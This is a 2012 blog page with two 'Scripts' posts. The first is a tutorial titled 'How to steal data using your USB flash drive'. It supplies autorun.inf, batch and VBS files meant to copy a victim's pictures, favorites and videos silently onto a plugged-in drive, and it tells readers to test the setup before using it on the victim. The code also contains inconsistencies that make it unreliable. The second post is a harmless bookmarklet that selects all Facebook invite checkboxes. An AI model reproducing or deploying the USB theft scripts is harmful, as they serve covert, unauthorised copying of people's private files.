Showing posts with label Scripts. Show all posts
Showing posts with label Scripts. Show all posts

Monday, 7 May 2012

How to steal data using your USB flash drive

Hello friends, In this tutorial we will revealed a new tweak which is illegal but sharing here for educational purpose.
This post is only to demonstrate how a user can steal victim's data without any permission, as soon as the flash drive is attached to computer, the files starts to copy in flash drive without any notice.

Process is very simple as we have to add only 4-5 notepad files in the flash drive.
Follow the following steps :-

1. Create a notepad file with name autorun.inf nad copy the following code.
[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat
2. Create another notepad file of name file.bat and copy the following code.
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% “%USERPROFILE%\pictures” “%drive%\all\My pics”
%backupcmd% “%USERPROFILE%\Favorites” “%drive%\all\Favorites”
%backupcmd% “%USERPROFILE%\videos” “%drive%\all\vids”
@echo off
cls
3. In our 3rd notepad file, copy the following code and save it as invisible.vbs

CreateObject(“Wscript.Shell”).Run “”"” & WScript.Arguments(0) & “”"”, 0, False

4. And in our last notepad file, copy this code and save the file as launch.bat

 wscript.exe \invisible.vbs file.bat

5. Now, copy all this 4 files in the root of  flash drive. And create a folder "all" where the content is to be copy.

6. Test this in your own computer first, before inserting this flash drive in victim's computer.

Monday, 9 April 2012

How to select all friends in facebook page

Hello friends,

Now i have a new tweak to select many friends on facebook page, event or suggest friends in a single click.
As we all have many friends in our accounts and it takes too much time to select them all one by one, just a wastage of time.

Follow :-

1. Login to your facebook account.
2. Navigate to the page or event where to select your all friends.
3. Click on Invite friends.
4. New box will appear, scroll down the list until your all friends name is loaded.
5. It will look like,
 

6. Now put this script in the address bar, and press Enter.


javascript:var x=document.getElementsByTagName("input");for(var i=0;i<x.length;i++) {if (x[i].type == 'checkbox') {x[i].click();}}; alert('Done, all your friends have been selected');


7. Wait for few seconds.
8. Then see the magic.

 9. Enjoy..!!!